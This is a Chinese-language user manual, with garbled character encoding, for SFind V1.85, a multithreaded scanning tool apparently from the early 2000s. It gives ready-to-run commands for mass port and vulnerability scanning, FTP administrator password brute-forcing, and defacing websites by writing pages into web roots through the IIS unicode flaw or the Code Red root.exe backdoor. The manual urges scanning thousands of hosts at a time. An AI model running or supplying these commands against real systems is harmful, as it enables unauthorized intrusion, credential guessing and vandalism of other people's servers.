sfind.exe是一款很優(yōu)秀的掃描工具，被部分黑客用來入侵但其實(shí)是安全工具,臨時(shí)推出SFindV1.85，增加了紅色代碼病毒主機(jī)的掃描，-um功能支持紅色代碼主機(jī)，可以直接修改其主頁，提供暴力破解ftp測試，此版的暴力破解為測試用，希望個(gè)位網(wǎng)友能及時(shí)將測試結(jié)果以及測試環(huán)境發(fā)給我，使SFind的暴力破解功能盡快推出，由于本人不智，耽誤了V1.9的正常發(fā)布，特此向各位道歉?。?！同時(shí)也請您繼續(xù)關(guān)注SFind的發(fā)展！謝謝！！
　　FTP暴力破解測試方法：SFind -cracker FTP ftp服務(wù)器地址 用戶名 smallletter
　　紅色部分為用戶填寫，其余參數(shù)不變，參數(shù)smllletter是指探測密碼類型，在此為小寫字符~
　　使 用 說 明
　　SFind是一款命令方式的多線程掃描工具，最大的特點(diǎn)是它不包含任何附屬文件，體積小、掃描速度快、攜
　　帶方便，掃描進(jìn)度顯示，僅僅只有一個(gè)EXE文件，在掃描完成后將結(jié)果保存到sfind.txt中。目前支持的功能
　　有(請大家支持本軟件，一起找BUG，謝謝！)：
　　端口掃描
　　CGI漏洞掃描
　　unicode漏洞掃描
　　.printer漏洞掃描
　　.idq漏洞掃描
　　FTP 匿名登陸掃描、通過FTP掃描administrator弱密碼
　　codered 病毒主機(jī)掃描 新功能！??！
　　利用unicode漏洞直接修改主頁、利用codered病毒修改主頁 新功能?。?！
　　下面看看詳細(xì)說明和運(yùn)行實(shí)例：
　　-p <端口開始端口 結(jié)束端口> 〈IP 地址開始地址 結(jié)束地址〉
　　端口掃描
　?。捍朔绞娇梢話呙铇?biāo)準(zhǔn)端口、自定義端口、可以對(duì)某一段地址內(nèi)的指定端口掃描,如果不指定端口則掃描標(biāo)準(zhǔn)端口，目前的標(biāo)準(zhǔn)端口為10個(gè)，分別是：21、23、25、53、79、80、110、1143、3389、5631。
　　SFind -p 192.168.0.1
　　掃描192.168.0.1的標(biāo)準(zhǔn)端口
　　SFind -p 192.168.0.1 192.168.0.255
　　掃描192.168.0.1到192.168.0.255范圍內(nèi)所有主機(jī)的標(biāo)準(zhǔn)端口
　　SFind -p 1 200 192.168.0.1
　　掃描192.168.0.1主機(jī)1到200的端口此方式只能一次掃描一臺(tái)主機(jī)
　　SFind -p 21 192.168.0.1
　　掃描192.168.0.1主機(jī)的21端口
　　SFind -p 21 192.168.0.1 192.168.0.255
　　掃描192.168.0.1到192.168.0.255中所有開放21端口的主機(jī),可以利用此功能查找開放終端服務(wù)(端口3389)的主機(jī)，也可以利用此功能快速查找中木馬冰河(端口7626)的主機(jī)
　　-cgi
　　cgi漏洞掃描：目前可以檢測784個(gè)CGI漏洞，此方式只能掃描一臺(tái)主機(jī)
　　SFind -cgi 192.168.0.1
　　掃描192.168.0.1的CGI漏洞
　　-uni <開始地址> <結(jié)束地址>
　　unicode漏洞掃描：如果不指定結(jié)束地址則只掃描一臺(tái)主機(jī)，如果找到漏洞主機(jī)可以使用-um功能進(jìn)行頁面修改
　　SFind -uni 192.168.0.1 192.168.0.255
　　掃描192.168.0.1到192.168.0.255范圍內(nèi)所有unicode漏洞主機(jī)
　　-pri <開始地址> <結(jié)束地址>
　　.printer漏洞掃描：這是個(gè)遠(yuǎn)程溢出漏洞，具體就不介紹了，如果不指定結(jié)束地址則掃描一臺(tái)主機(jī)
　　SFind -pri 192.168.0.1 192.168.0.255
　　掃描192.168.0.1 192.168.0.255范圍內(nèi)所有存在.printer漏洞的主機(jī)
　　-idq <開始地址> <結(jié)束地址>
　　.idq漏洞掃描：掃描.idq遠(yuǎn)程溢出漏洞，如果不指定結(jié)束地址則掃描一臺(tái)主機(jī)
　　SFind -idq 192.168.0.1 192.168.0.255
　　掃描192.168.0.1到192.168.0.255范圍內(nèi)所有存在.idq漏洞的主機(jī)
　　-um <信息>
　　對(duì)存在unicode漏洞的主機(jī)和有codered病毒的主機(jī)進(jìn)行頁面修改，默認(rèn)的WEB路徑是c:\inetpub\wwwroot,使用此功能在對(duì)方機(jī)器的指定目錄生成index.htm、index.asp、default.htm、default.asp四個(gè)文件，文件信息自己定義，大家可以在自己的機(jī)器上試試此功能
　　SFind -um 192.168.0.1 Hacker+by+Sunw
　　此命令將在192.168.0.1的c:\inetpub\wwwroot目錄生成上敘四個(gè)文件，內(nèi)容為:HackerbySunw
　　SFind -um 192.168.0.1 c:\inetpub\ts Hacker+by+Sunw
　　此命令在192.168.0.1的c:\inetpub\ts目錄生成上敘四個(gè)文件，內(nèi)容為：Hacker by Sunw
　　在使用此功能時(shí)必須要有權(quán)限對(duì)目錄進(jìn)行操作，如果在wwwroot目錄不成功，可以換到inetpub\ts目錄，這個(gè)目錄可以寫，信息內(nèi)容不能超過50個(gè)字符，可以是英文也可以是中文(如果是中文則不能超過25個(gè)字)，在寫信息時(shí)空格字符用+號(hào)代替，中間不能有"<"、">"和"="符號(hào)。如果是上傳到inetpub\ts目錄，則可以通過在瀏覽器調(diào)用//xxx.xxx.xxx.xxx/ts/default.asp查看
　　-ftp <開始地址> <結(jié)束地址> [-admin]
　　FTP掃描：掃描允許匿名登陸的FTP服務(wù)器，如果加-admin參數(shù)則通過FTP服務(wù)器掃描administrator弱密碼,如不指定結(jié)束地址則只掃描一臺(tái)主機(jī)
　　SFind -ftp 192.168.0.1 192.168.0.255
　　此命令掃描192.168.0.1到192.168.0.255范圍內(nèi)所有允許匿名登陸的主機(jī)
　　SFind -ftp 192.168.0.1 192.168.0.255 -admin
　　此命令通過FTP服務(wù)器掃administrator弱密碼，因?yàn)閍dministrator在默認(rèn)情況下是FTP服務(wù)的管理者，所以可以利用次特征掃描超級(jí)用戶的口令。在綠盟xdowns56kModem上掃4000個(gè)ip地址絕不超過5分鐘，所以利用此功能時(shí)請務(wù)必加大搜索力度，一次掃3000說什么也不過分
　　-codered <開始地址> <結(jié)束地址>
　　codered病毒主機(jī)掃描：掃描存在codered病毒的主機(jī)，此功能利用codered病毒會(huì)將cmd.exe復(fù)制到inetpub\ts目錄下root.exe的特性進(jìn)行測試,如果對(duì)方主機(jī)inetpub\ts目錄存在root.exe則認(rèn)為有codered病毒，可以直接通過瀏覽器調(diào)用root.exe,//地址/ts/root.exe？/c,具體的操作和unicode漏洞完全相同，如果要修改主頁可以直接使用SFind的um功能！
　　SFind -codered 192.168.0.1 192.168.0.255
　　此命令掃描192.168.0.1 192.168.0.255范圍內(nèi)所有存在紅色代碼病毒的主機(jī)
　　本軟件采用多線程掃描，如果網(wǎng)速過慢可能會(huì)擁擠導(dǎo)致無法正確掃描，可以按Ctrl+C中斷掃描，在進(jìn)行掃描時(shí)上次的掃描結(jié)果將被覆蓋。
　　軟件為免費(fèi)軟件可以任意復(fù)制，如果利用此軟件做違法的事情，使用者自行承擔(dān)責(zé)任。目前為測試版本，可能存在種種漏洞，如果您有發(fā)現(xiàn)或者有好的建議或意見請E-mailtoSunwMail@163.net也可以到我的主頁 //sw_sun.myetang.com 留言給我，十分感謝您的測試！